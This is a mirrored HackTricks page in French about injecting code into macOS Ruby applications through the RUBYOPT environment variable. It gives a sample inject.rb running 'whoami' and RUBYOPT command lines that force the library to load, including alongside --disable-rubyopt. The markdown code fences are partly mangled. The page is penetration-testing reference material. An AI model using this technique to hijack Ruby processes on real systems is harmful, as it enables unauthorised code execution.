mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-09 03:38:51 +00:00
60 lines
3.3 KiB
Markdown
60 lines
3.3 KiB
Markdown
|
# Injection dans les applications Ruby macOS
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Autres moyens de soutenir HackTricks :
|
||
|
|
||
|
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez**-moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## RUBYOPT
|
||
|
|
||
|
En utilisant cette variable d'environnement, il est possible **d'ajouter de nouveaux paramètres** à **ruby** chaque fois qu'il est exécuté. Bien que le paramètre **`-e`** ne puisse pas être utilisé pour spécifier du code ruby à exécuter, il est possible d'utiliser les paramètres **`-I`** et **`-r`** pour ajouter un nouveau dossier au chemin de chargement des bibliothèques et ensuite **spécifier une bibliothèque à charger**.
|
||
|
|
||
|
Créez la bibliothèque **`inject.rb`** dans **`/tmp`** :
|
||
|
|
||
|
{% code title="inject.rb" %}
|
||
|
```ruby
|
||
|
puts `whoami`
|
||
|
```
|
||
|
```markdown
|
||
|
{% endcode %}
|
||
|
|
||
|
Créez n'importe où un script ruby comme :
|
||
|
|
||
|
{% code title="hello.rb" %}
|
||
|
```
|
||
|
```ruby
|
||
|
puts 'Hello, World!'
|
||
|
```
|
||
|
```markdown
|
||
|
Puis chargez un script ruby arbitraire avec :
|
||
|
```
|
||
|
```bash
|
||
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb
|
||
|
```
|
||
|
Fait amusant, cela fonctionne même avec le paramètre **`--disable-rubyopt`** :
|
||
|
```bash
|
||
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
|
||
|
```
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Autres moyens de soutenir HackTricks :
|
||
|
|
||
|
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez**-moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
* **Partagez vos astuces de piratage en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|